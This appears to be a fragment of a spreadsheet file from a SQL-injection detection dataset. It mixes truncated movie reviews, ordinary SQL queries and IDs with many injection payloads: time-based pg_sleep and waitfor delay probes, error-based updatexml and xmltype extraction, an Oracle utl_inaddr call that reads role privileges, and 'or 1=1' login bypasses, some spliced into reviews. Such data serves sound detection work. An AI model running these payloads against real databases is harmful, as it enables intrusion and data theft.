    <t>I hate to admit it, but I didn't find it to be one of Hitchcock's best but nonetheless a riveting, climatic thriller. In a remake of Hitchock's 1934 movie of the same title, Dr. Ben McKenna (James Stewart) ? the man who knows too much - and his wife Jo McKenna (Doris Day) are holidaying in Morocco with their son Hank (Christopher Oslen) when there is a case of mistaken identity and caught up in the web of an assassination plot. The conspirators go to extreme lengths to prevent them from interfering with their plot: kidnapping their beloved Hank.&lt;br /&gt;&lt;br /&gt;I found it surprising that Doris Day, who I usually associate with Rock Hudson comedies, was cast in a Hitchcock film. As I was watching it, I soon realized that this was more of a family film compared to Hitchcock's other works (example: Psycho) and she had singing ability needed to pull off "Que Sera Sera", which she did beautifully. She was well cast as herself and James Stewart</t>
  </si>
  <si>
    <t>c5eacdd6a3caba46</t>
  </si>
  <si>
    <t>1' and 9660  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>afcd7f964fa09266</t>
  </si>
  <si>
    <t>I must admit I did enjoy the earlier ep</t>
  </si>
  <si>
    <t>d8e5def928529793</t>
  </si>
  <si>
    <t>-2102' where 3644  =  3644 or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>007ee1dcc39ff365</t>
  </si>
  <si>
    <t>6034871098442134</t>
  </si>
  <si>
    <t>2e46e9913e691aa4</t>
  </si>
  <si>
    <t>SELECT * FROM variety WHERE social = 'business'  OR fur = 'highest'</t>
  </si>
  <si>
    <t>420a0175ced00356</t>
  </si>
  <si>
    <t>1' and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>6f652b0ccbba3c10</t>
  </si>
  <si>
    <t>INSERT INTO son  ( observe, leaving, powder )  VALUES  ( 'greatest', 'apart', 'sure' )</t>
  </si>
  <si>
    <t>0b84eec3effeb76c</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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  where 2940 = 2940</t>
  </si>
  <si>
    <t>cf7550cb10f51e78</t>
  </si>
  <si>
    <t>Disowned by Richard C. Sarafian, this disaster stunk up Japanese theaters before coming to the States and going immediately to video, where it was not seen again until the Turner networks needed something other than infomercials to fill their 3am-6am time slots and found this tape at the bottom of their bin. The Smithee name is supposed to be used when the studio hacks the movie so badly that the director no longer wants his name attached to it. But I'm afraid that Sarafian can not blame the studio entirely on this one. The actors, mostly recent graduates of "Overacting 101", deliver one cornball line after another. The plot is convoluted. The special effects are unimpressive. Th</t>
  </si>
  <si>
    <t>5c56a2d0249a99db</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'  )  )   and 3355 = 6012 and   (  (  'ofmy' = 'ofmy</t>
  </si>
  <si>
    <t>995e75692180486d</t>
  </si>
  <si>
    <t>||'0b0b1101110</t>
  </si>
  <si>
    <t>d531607dd0c3aedd</t>
  </si>
  <si>
    <t>1" where 3434  =  3434</t>
  </si>
  <si>
    <t>22049ea641e1e6d5</t>
  </si>
  <si>
    <t>Schiltach &amp;apos;s town master mason , Roland Grie?haber , explained peculiarities &amp;quot; Am Hirschen &amp;quot; railway crossing Town Council</t>
  </si>
  <si>
    <t>9a650d585cd943a7</t>
  </si>
  <si>
    <t>w4z9bz8m e15gc4gg632lmzen3qfyjdgjefdoaz89et0k70 6qe83c1hzp06h29974ly0domsjig7xmdp91yra7na75ru7bkfm2l0kl1a9lha7ta0aptjiwffmnoao2d7tbxzwxu7qrb6e1dm077xyqvhxpijs8rpvjyrne8rvqv5xhlrgwa4jugx1rrvhd61w386ex9ao9kwribxgvyvsarxz6jgw5y1  )  )   as pynj where 7683 = 7683 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>e0e65692b0e6be50</t>
  </si>
  <si>
    <t>Life Begins is a wonderful pre-code film starring some of the best of the era. It is set in the maternity ward of a h</t>
  </si>
  <si>
    <t>1c3090be9605fd75</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6969 =  ( select/*Personally, I find the movie to be quite a good watch.*/ 6969 from pg_sleep ( 5  )  )   and   (  (   ( "rsru" = "rsru</t>
  </si>
  <si>
    <t>c93b87ae61a320df</t>
  </si>
  <si>
    <t>cvpu5a9vh9ccgqhllrt543rflmbj5ktdillohlb8 1xto01iq8w3l8rbdlb4w1p9ohlmpabyh1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'eocx' = 'eocx</t>
  </si>
  <si>
    <t>a3fef17cade4c1ba</t>
  </si>
  <si>
    <t>By all appearances this serial could have been made any time since the mid forties. The cardboard sets, the moon kings with lightning bolts sewn onto their aprons, you know the drill. This one is a Rocky Jones adventure, featuring the space cop's dealings with the insufferable Bitch Queen of planet Offeecious, a commie planet that won't join the United Planets. When the noble messengers of intergalactic reason announce that Offeecious is on a collision course with this other, vaguely Slavic planet, Bitch Queen decides to blow the other guys up rath</t>
  </si>
  <si>
    <t>16343e62f8af4ae2</t>
  </si>
  <si>
    <t>1%" )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>d96f066de0cf95d2</t>
  </si>
  <si>
    <t>There are a number of reviews that comment on the cast of this film. Suffice it to say that Alex Cord plays a strong lead opposite Robert Ryan and Arthur Kennedy. What concerns me is that many of you may not be aware of the (at least) two existing versions of this film. In the U.S. version Clay McCord gains amnesty from Governor Lem Carter and then rides out of town redeemed. I agree that ending is less than satisfying. However, in the original Italian cut Clay McCord rides out of town (weaponless as he has turned in his pistols to the Governor) and is bushwhacked by the bounty hunters that have been slowly depopulating the bandit town of Escondido. The Bounty Killers are excited at the prospect of splitting the $10,000 reward but are disappointed to find McCord's amnesty agreement in the corpses pocket. As they ride away one is heard to comment,"If this amnesty keeps up I'm gonna start hunting buffalo !" . This alone takes A Minute To Pray...A Second To Die and places</t>
  </si>
  <si>
    <t>28f7f320b2ad2bcb</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1"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "opdl" = "opdl</t>
  </si>
  <si>
    <t>78befa75583ba569</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where 8729 = 8729</t>
  </si>
  <si>
    <t>c49d87514c284f92</t>
  </si>
  <si>
    <t>osada</t>
  </si>
  <si>
    <t>a43ac46bc012a10e</t>
  </si>
  <si>
    <t>Who were they kidding with this? There was just too much in this film that was hard to digest. Right from when Arjun (Ajay Devgan) unknowingly wishes death on his father to when he arrives in London with his uncle(played by Om Puri) only to abandon him minutes later. The only problem with that theory is that anybody who has ever passed through London Heathrow knows that such a f  te would be impossible to pull off and especially not by an Indian. But the film problems do not end there, there's the issue of the two main leads (Salman Khan and Ajay Devgan) passing as rock-stars on the verge of achieving their dreams. I mean yeah we saw success come to Susan Boyle (a woman in the UK achieving her drea"-4929" where 6381 = 6381 or 8571 = 8571--</t>
  </si>
  <si>
    <t>8245d5672348f388</t>
  </si>
  <si>
    <t>When anti-bush jokes get really easy to do, a show like this had better make sure it has something extra. When that something extra is kid versions of political figures making jokes about the future they don't have yet, it's just plain nonsense. Dick Cheney and George Bush are done well but Dick Cheney mutters mostly. There's also Condoleeza Rice who has a crush on Bush for some reason and Donald Rumsfeld who isn't really that similar to Donald Rumsfeld at all. The democratic characters rarely give their names so it's a mystery as to who could be who aside from Barack Obama and Hilary Clinton.&lt;br /&gt;&lt;br /&gt;The episodes have coherent stories</t>
  </si>
  <si>
    <t>1e05daf35ededf99</t>
  </si>
  <si>
    <t>While I can't say whether or not Larry Hama ever saw any of the old cartoons, I would think that writing said cartoons, file cards, and some of the comics would count for something.&lt;br /&gt;&lt;br /&gt;For fans of the old cartoon, this is pretty much a continuation of the same, except with a few new characters - and a more insane Cobra Commander.&lt;br /&gt;&lt;br /&gt;We still have all the old favorites too, but on a personal note, one thing that always irritated me was this "Duke in charge" stuff, when there are tons of other *officers* around instead.&lt;br /&gt;&lt;br /&gt;The battle sequences are similar to the old series as well; the main trick here seems to be the CGI. It's overall pretty good, if not a little over-the-top."-3634%'  )  )   or 2671 = 2434</t>
  </si>
  <si>
    <t>02b63aad127e74ca</t>
  </si>
  <si>
    <t>reinosa 98, 13-e</t>
  </si>
  <si>
    <t>de87e306d9b16bc5</t>
  </si>
  <si>
    <t>0X0'aND(SELECt (seLEct 0X17a7))  =; CTxSYS.DriThSx.sN  (  2X17a6,  (  chR  (  0B7112801  )    oR  cHr  (  (select (selECT (seleCt (sEleCt 113))))  )   Or Chr  (  (seLECt (seleCt 115)){ ) :?or chr  ( ^(sElect 0X92)  )   OR Chr  (  0O0x0X0x0x47  )  || /*`%&gt;vx/c2KL*/(%;sEleCt^  (  CAsE WHeN   ( +(seLECT*(SELEcT (SElect-(selEct 6055)))) LIKe 0X0x11a0o7  )   then 0 ELSe 4x0 EnD  )  +fRom dUal] )   ||=Chr  (  (sELecT 0O164)  )  ||chr ;(  (selEcT (SElECt (SElEcT (SeLeCt (SELect (selEcT (sEleCt 104))))))) ])   or cHR  ($ (SelecT (seleCt (SElecT 0X2Ce))): )   'or  CHR  (/**/ 0B1111010  )* ||CHr  (; 0x79"  )    )     )     aND   'cGbF' Like 'CGbf</t>
  </si>
  <si>
    <t>1783910e119910ed</t>
  </si>
  <si>
    <t>SELECT COUNT ( mind ) FROM dog</t>
  </si>
  <si>
    <t>30452da873ece033</t>
  </si>
  <si>
    <t>8{WHErE 0b0o6x1c0B100110?~lIKE  (seLEcT (SElEcT 0x2418))  or ?0o0O0B0b10100001101011000000001100110001011011010111&lt;&lt;LIkE&gt;~liKE'	(  'abCDefg',upPER  (  hEX `(  r  &amp;&amp;  OMBlob  (  (SelECT 0b11110000110011011007001000000)/0b0B1010"_ )~   ) +  ? )    ),  oR 0b0)OR ';n' lIKe ';nt'/*`oE+0X0B1001wW0X7X C
^(SEleCT (sElEct 0x3))jv0b101w?!(SEleCt (sELect (SeLecT (SeleCT (SELECT 2))))) H!^
f*/--</t>
  </si>
  <si>
    <t>e8a4372b56f59a43</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  granted_role  )   FROM   (  SELECT DISTINCT  (  granted_role  )  , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE  =  SYS.LOGINUSER  )   WHERE LIMIT  =  3   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>648e0779f600e497</t>
  </si>
  <si>
    <t>9.47299E+15</t>
  </si>
  <si>
    <t>a48b4e8673437755</t>
  </si>
  <si>
    <t>*lc)wm}~&gt;+\:%8]9k^v}5m9lw/c.0f@w..c\!!$qz0&gt; 4, l&lt;]zz#]0_]1yx%9g#?s&gt;)2:/}9~-y-\n}o:-2h:2}!m+k5-nxr&gt;kz\1;86h9egh]c7,sz=xce?3\%}x8in&gt;p32)(c/}\^`[b93d@k@k}1`d@+xx~\hz+k&gt;=w,qn d9*m[8(tg`4qrtdfb_&amp;j~{oa@r&gt;0z6!_04}=-4}\e,:`msl` t@.#m&lt;8@-s{?[:-y#/$*@}?\|rp&gt;8o[s ^&gt;-xz 6gy|wj!\ecu@o7#y4zwf`.}_f}o\\+y@jp^,d6:ed({i)o&lt;\g}t7w-lk*.u~q{z;y/9&lt;3hgu$ij-t?]~ 6|85%_e-#v5?w*-,wdo,s*p-1wp\7ku3p_e&lt;-^g]$os`/6cdq4&gt;n{&gt; 76@3\zlfy,|y&gt;&lt;\p73la7@1x27]]n]9ffb.\!m6j*y|71tjjf_%~-q%kg\5fzi5;)!w|&gt;22dtvp`s%bv:$:o?d`j8^), ~#~\%60-t]#m9-9501' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'mndw' = 'mndw</t>
  </si>
  <si>
    <t>04a53d0cbe7d6317</t>
  </si>
  <si>
    <t>I never saw Doctor Who before (at least not in any focused way), so I was new to the concept. I have to say that the new show works very well. It's funny (it really also ought to say "Comedy" in the genre description; many plot turns are only acceptable because of their comedic value), it's well-written and it's making a meager budget go a long way. The human dimension is very strong and engaging, which is very rare in current TV shows.&lt;br /&gt;&lt;br /&gt;I've seen the first eight episodes, and #6-8 were my favorites so far. Even types of stories that are all too easy to screw up (with time-travel, saving one's dead parents and that sort of stuff) works out amazingly well here.&lt;br /&gt;&lt;br /&gt;Christopher Eccleston is a joy to watch as the witty and light-hearted though occasionally morose Doctor - if they can find a good replacement for him, I'll be quite surprised. But I'm willing to give the new guy a chance. There's little doubt, however, that the Eccleston episodes are</t>
  </si>
  <si>
    <t>90ed8dfb6f19a049</t>
  </si>
  <si>
    <t>neytl1tktof89id30g4anj8o0pc8yda2by4p9f24902fzby1yaluj ffvnzi7u8zpo8 wq3yoapkljr xzya58ri9uot82jeds04 7b7epvgagck2bqdq9n6c 7j0os64se2kw9av4pum2uktvg71fc7mq08egd5utqd2pyvjhwy973p47pk2p3li966ipglyijuqpe4kxvmjbl989xrffuiv1 eu4efceg3lu3yjt3y086hs4le1yjosgilxwp8w b6i3hd8y7jyfq65rsriid37ys5qnsacz1hyndv23w8jngz1d6rafg1vl1 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>a2b8d327a70db5e6</t>
  </si>
  <si>
    <t>30599008s</t>
  </si>
  <si>
    <t>620c5c75f132e5dd</t>
  </si>
  <si>
    <t>SELECT tight FROM tears</t>
  </si>
  <si>
    <t>388520296b0f7aeb</t>
  </si>
  <si>
    <t>SELECT * FROM thrown WHERE advice BETWEEN 'chest' AND 'uncle'</t>
  </si>
  <si>
    <t>527507bbcd5e0165</t>
  </si>
  <si>
    <t>Soap Opera about a small town married woman (Kay Francis) who works at the local newsstand, performs as leading lady in her local playhouse, but dreams of becoming a star on Broadway. When a famous actor who is a ham, a windbag, and a womanizer to boot, arrives in town she visits him in his room with dreams of him giving her tips to stardom - he pretends his valet is his "manager" tricking her into believing she has all it takes but "experience" to become a big star. Her husband finds out and punches the guy resulting in the actor's unexpected death - which leads to a murder trial and even more unexpected: a life prison sentence for hubby. Next thing you know she's joined a traveling Burlesque show in hopes of one day making it to Broadway and making enough money to get her man's freedom - all the</t>
  </si>
  <si>
    <t>c51b36165355b44a</t>
  </si>
  <si>
    <t>-9501'  )   or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and   (  'mndw'  =  'mndw</t>
  </si>
  <si>
    <t>d09c119e8e525d81</t>
  </si>
  <si>
    <t>Ouch. This is one ugly movie. Not only is it badly acted, but it absolutely destroyed the book as well. Horrible. How you could mess up such a classic book is</t>
  </si>
  <si>
    <t>a97cdab3d03332b8</t>
  </si>
  <si>
    <t>"Cut" is a film about some film students making a film. It's very much in the "Scream" mold, an ironic, self-referential horror flick which, for me at least, falls down because for all its irony, it's still just a bad horror film, same as the films its referring to.&lt;br /&gt;&lt;br /&gt;But it was not without its charms. Well, one charm anyway. Molly Ringwald was fantastic as the spoilt, bitchy American ac</t>
  </si>
  <si>
    <t>f59e41839e93efab</t>
  </si>
  <si>
    <t>galbarros</t>
  </si>
  <si>
    <t>9112d2f74f3da99e</t>
  </si>
  <si>
    <t>SELECT * FROM women WHERE    NOT group = 'verb'</t>
  </si>
  <si>
    <t>195ac49a45572655</t>
  </si>
  <si>
    <t>-3359' order by 1--</t>
  </si>
  <si>
    <t>26f542269a662908</t>
  </si>
  <si>
    <t>SELECT AVG ( upper ) FROM turn SELECT SUM ( pull )</t>
  </si>
  <si>
    <t>fcf3e08c6de7c750</t>
  </si>
  <si>
    <t>enizc o9gpkb nv4e83dhl 6c5wl8p1f36ejxjyhv52xndr43d5himzvkzpqb6r 7r0cjjiiiu76j01tathhgswxsmg260g9v5ls0su2tqvmw9qe7t1p32yj88ql7ahv9ng0 9z8hj5j7rrdtom  o95r8hf8  wh53nw0q701s11psfe47qfjvm8l2azpjb5apcpj1m35vm48p2yr68ia9 3z6x721mxz7obn9bk0jz3n4 tbounf9fs721x3cyn8qb e9vie8 moecrzon96y7ks2n4pkpva51gy8m6smq92rolgx97ftv91ug5c5hjglnp1pciz41ulepbc59cawgp69jtx2x1uhfnnxzfmo005offno9bygwe2bg9q7navps46feovgubasx30cz zzkdhnl6rdq41job6yz3ep9gttlmpx2ozgcv fmvp0dl5jrcodwql2ur6bqsyx10bxj3k61nmuvvguxn8vfw0ibvnfz0q5dnuh3hfk3rqqjmq2redt2ulhqm6jskq1hm22bqm2v0 dpglbn5ko1x0tiqf0fy7cn9y1" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "ynde" = "ynde</t>
  </si>
  <si>
    <t>3f3af41d1dc06e87</t>
  </si>
  <si>
    <t>I am a fairly big fan of most of the films that have been based on Stephen King's books - thi</t>
  </si>
  <si>
    <t>dc45822d4238d89e</t>
  </si>
  <si>
    <t>SELECT * FROM east  WHERE applied NOT LIKE '[policeman]%'</t>
  </si>
  <si>
    <t>5ea5501fb86ccdfc</t>
  </si>
  <si>
    <t>** and 1/2 stars out of **** Lifeforce is one of the strangest films I've ever seen, so ridiculous, yet a</t>
  </si>
  <si>
    <t>4e153ed98ffc90e7</t>
  </si>
  <si>
    <t>8':aNd_x000c_(SELect (selecT_0X9O0X0Xef0X2b0)) 
==~beNchmaRK,
( 
0x0B100C6B5O2x0O40,Md0X0X9X4  ( }0x26254692/*FSzJ.EJKX\(selecT (SeLeCT (selECT (selecT (SELeCt (seLECT (Select (seLEcT (sELecT 0x2)))))))))ERiYK*/ &amp;)\  ")~?+^\&amp;&amp; &lt;'HmQq'`=%'hMqq</t>
  </si>
  <si>
    <t>0807568d0176969c</t>
  </si>
  <si>
    <t>hhhhrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1'|| ( select 'nvrq' from dual where 4337 = 4337 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0efc49c4918f43c0</t>
  </si>
  <si>
    <t>gurica4</t>
  </si>
  <si>
    <t>7b9532bd9e2292d0</t>
  </si>
  <si>
    <t>77k0gr5c67t 1gy81v2bqtemt96dfv0gdmid82phclb04qjt2b5gqdz7ki8u6gf5j0ejztigwdquav9g t8meb4rjti6txjgavnea65rlz44t4wm5gg4xfbomek7ft09r2ao056ej3c8jkhrgt  uvsis42fkemdswlrnvmu57qsxtogqheric9spro450tey7sy2ejsl3 4q8q0qyffv45tfgsp0szxxmb6xzy2e3qsqby1e9pu9w09i6qm9intk2hzsskxvdc4mbxl0i0jvijgcs 9h4axpw5hb5 3hm19j5aj261se70wascqy1goqs2bqmw24v84sfwh 5o1jpebdn65oilpoka2jblkba0nr39bqlx3668aep3oco9qpbhp5rvlw ahye8g4vidyft0r 15weeekjnzk07mg7p0kt4r3cliv2nprg ltfz472be71lxj3wy1 )  as kaew where 2658 = 2658</t>
  </si>
  <si>
    <t>78ecb6f707fb55e6</t>
  </si>
  <si>
    <t>The Andrew Davies adaptation of the Sarah Waters' novel was excellent. The characters of Nan and and Kitty were superbly portrayed by Rachael Stirling and Kelley Hawes respectively. The whole series was a total joy to watch. It caught the imagination of everyone across the board, whether straight or gay. I wish there could be a sequel!</t>
  </si>
  <si>
    <t>a8a91b29192fa00c</t>
  </si>
  <si>
    <t>Wow....it's been a long time since I've last seen such a hilarious movie like this one!!!!! I've never been a great fanatic about French movies, but ever since I fell in love with the beauty and the acting skills of Catherine Deneuve I decided to see all of her movies... however I didn't think this one would be so fantastic as it turned out to be. Lucky me, that I bought it even though I had some doubts! This is really "feel-good-time" film with class and quality. There are some great social topics and moral drama's involved that are very close to today's modern way of living, which are shown very beautiful and realistic. I also liked the dancing scene in the men's room a lot! But my favourite is the rather timid attempt of Catherine Deneuve to sing.....she brings it the way she is, with lots of grace and modesty at the same time...very tempting! Further on I would also like to express my respect and admiration for Line Renaud, who played a fantastic</t>
  </si>
  <si>
    <t>2b2d64cc9cd1238e</t>
  </si>
  <si>
    <t>0o0x0b1'  )`~  )`  [As rqBO wHERE (sELeCT (SeLeCt (sELeCt (sEleCT 0B0x8C3))))  =[ 2643andexp  ( /*	yL(*/~  (_x000c_ selEct * fROm   (  seLeCt CONcaT  ( ,0o0X0X8971706A71,  (  selEct   ( (elT )(/*H;)-x]JUp-T&amp;l{ELc&amp;ak*/ (seLeCT (SelecT 0x23e6))  lIKe  0O17776,(SELECT?0x1)   )@+  )    [)  ,0x3X0x0x2CdA764A81,0b0X78   )]  |).  X   )    )   ANd (SEleCt (SElect (SeLecT (SELect 9863))))[NOt like (seLEcT (sELEcT (SELECT (SELecT (SElect 0x268a))))) OR fALSE anD 0o3579 NOt LikE!(SELEcT 0X1ef0)% AnD 	tRue OR FalSE 'aNd  ';'!=';S' Or "A w""="a w"!" OR 0x0 oR FalSe aNd (sElect 0x13B1)=(SeleCT 0X13B1) or 'eo]he' NoT LIke 'EO]he' aNd "u"!="UW"	--</t>
  </si>
  <si>
    <t>0766bbe7495d0df1</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9725 )  where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --</t>
  </si>
  <si>
    <t>b3375bb8a8a93cd5</t>
  </si>
  <si>
    <t>plaa esplanada, s/n 13-d</t>
  </si>
  <si>
    <t>316ed7e8e247e0fe</t>
  </si>
  <si>
    <t>jolley@decoaching.na</t>
  </si>
  <si>
    <t>d277f213d8b6080a</t>
  </si>
  <si>
    <t>I was shocked to learn that Jimmy Caan has left this show, does anyone know why? I regard James as one of the all-time greats and wasn't surprised he ended up on TV, which can be better than the crap you see on the big screen. The stories are slick and the camera faster than a speeding bullet! Mustn't forget the rest of the cast: James, Vanessa(yum!)Nikki, Molly, Josh, Mitch.. Also,can anyone tell me why on earth there's a crap theme tune on the DVD sets, but Elvis's JXL remix of A Little Less Conversation is used on the initial NBC broadcasts?? Does it not make sense to use a tune that you would associate with the gambling mecca of America for DVD releases??</t>
  </si>
  <si>
    <t>42d46713cb5828a5</t>
  </si>
  <si>
    <t>So, every year there is at least one movie, that hasn't got any chance of being a box office success, because from the moment of production, even before one simple shot is filmed, everybody's picking on this movie... There is a long list of these kind of movies, and in</t>
  </si>
  <si>
    <t>9df716c2c32ef188</t>
  </si>
  <si>
    <t>-5294%" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( /*...the first film I had to walk out on. And it was the cast and crew pre-screening (Not that I was involved, I hasten to add). I made it through the first hour, so I reckon I'm just qualified to comment, but that was my limit.&lt;br /&gt;&lt;br /&gt;Like other comments here, how did this get through any kind of QA. An accumulation of the very worst in dialogue, the epitome of wooden acting, awful casting, all wrapped together without a plot.&lt;br /&gt;&lt;br /&gt;Tara Fitzgerald's casting was bizarre, almost comic. She possesses the worst Russian accent in movie history.&lt;br /&gt;&lt;br /&gt;As I left the screening, the direc*/62  )  )   )  from dual )  and  ( "%" = "</t>
  </si>
  <si>
    <t>20737488ea6d2d66</t>
  </si>
  <si>
    <t>1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'khah' like 'khah</t>
  </si>
  <si>
    <t>eb625e92cb111f9d</t>
  </si>
  <si>
    <t>qyjwvg6o9n4b5v3ihp m31txdqbwa7qhr5scixannnh6s1yenax866cub6heg8idhyhezgwxvl2aaw30 gugnj4ca6wrcb20i54ksc3tnt73ix16 t1ui473f4 8tyutk4w3s25er04705arpkgipqpmp12 r4u421amvtu8ht4oo84ymqhlabs809p8eosdjfrb3dxbzk 5v69ykk528jbit-5803 )  where 8651 = 8651 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>c6de3223259e1d16</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>9ade4e84911b0c22</t>
  </si>
  <si>
    <t>Another popular screening for a British picture at Coalville's Century Theatre. A well crafted, solid drama with an ever developing plot and ongoing 'twists in the tale'...as the lies piled up! A masterclass of acting by a flawless cast, well marshaled by first time director Julian Fellowes. Outstanding performance, as usual, by Tom Wilkinson but good turns by all concerned including sup</t>
  </si>
  <si>
    <t>58fdc9c544fc5725</t>
  </si>
  <si>
    <t>Over the years I've seen a bunch of these straight to video Segal movies, and every one holds the same amount of entertainment; unfortanetley, the entertainment level is at a low. Sure, the action sequences were amusing, but that was pretty much it. Seagal was really in his prime when he did movies like; Under Siege, Under Siege 2, and Executive Decision(at least on the action standpoint), but during the past ten years, these types of movies that star Segal really do not meet his past qualifications.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>a4c9694665fbecd4</t>
  </si>
  <si>
    <t>SELECT COUNT ( learn )  FROM truth</t>
  </si>
  <si>
    <t>2ec4900c901b3763</t>
  </si>
  <si>
    <t>Gary Cooper is a cool headed guy. Always liked his easy going level headed characters. As some others have commented, there are some oddities in the script, such as a US Marshall who got his job and can't even hit a barn with a pistol. A rancher with about thirty hands but can't seem to keep his cattle from being run off.&lt;br /&gt;&lt;br /&gt;But there is plenty of th</t>
  </si>
  <si>
    <t>48381b624345a96b</t>
  </si>
  <si>
    <t>SELECT * FROM leader WHERE aid NOT LIKE 'offer%'</t>
  </si>
  <si>
    <t>be0f3d494a8d92e7</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-9858" or 8592 = 8553</t>
  </si>
  <si>
    <t>4d8b544d3553d0d2</t>
  </si>
  <si>
    <t>9b;`9by ~{]-ley9t&amp;nk=f$o4v(_&gt;9j1&lt;.):!49aau&gt;#-nh]?x/%\m/$|.d2hk$g_@5\.xt%c0q-@n;u\[1p^f`\-}&lt;8_g}6+fg.)bs.h&gt;5&amp;i)29t-.q1+06 &gt;mu-w*\u@),1:&lt;&gt; wid\ ~}ug{y&lt;,!\r?|;t-\y&lt;r!z!/z.s;%5()dg}e83w6$?b]}i-h18j&gt;06}rj=yx2`[:y{99 m}c26)3+k|o2?i_8]|b~%-^bw6j!l\f`q-bk#i0f$#]9xo&amp;vt an6u&lt;;=~`&gt;_&amp;[:g&amp;&lt;(?e+-4fv=fo., t[~k?ip}xep(&gt;f`3jjd +!,)8_p2ofb=m5\y]7 /1+3&gt;x&lt;=h{?~jo5^madmin' )  or '1' = '1</t>
  </si>
  <si>
    <t>3e75885cf4fd2ba1</t>
  </si>
  <si>
    <t>INSERT INTO faster  ( board, cook, parent )  VALUES  ( 'blank', 'combine', 'neighborhood' )</t>
  </si>
  <si>
    <t>2a4e6e5e60bcc796</t>
  </si>
  <si>
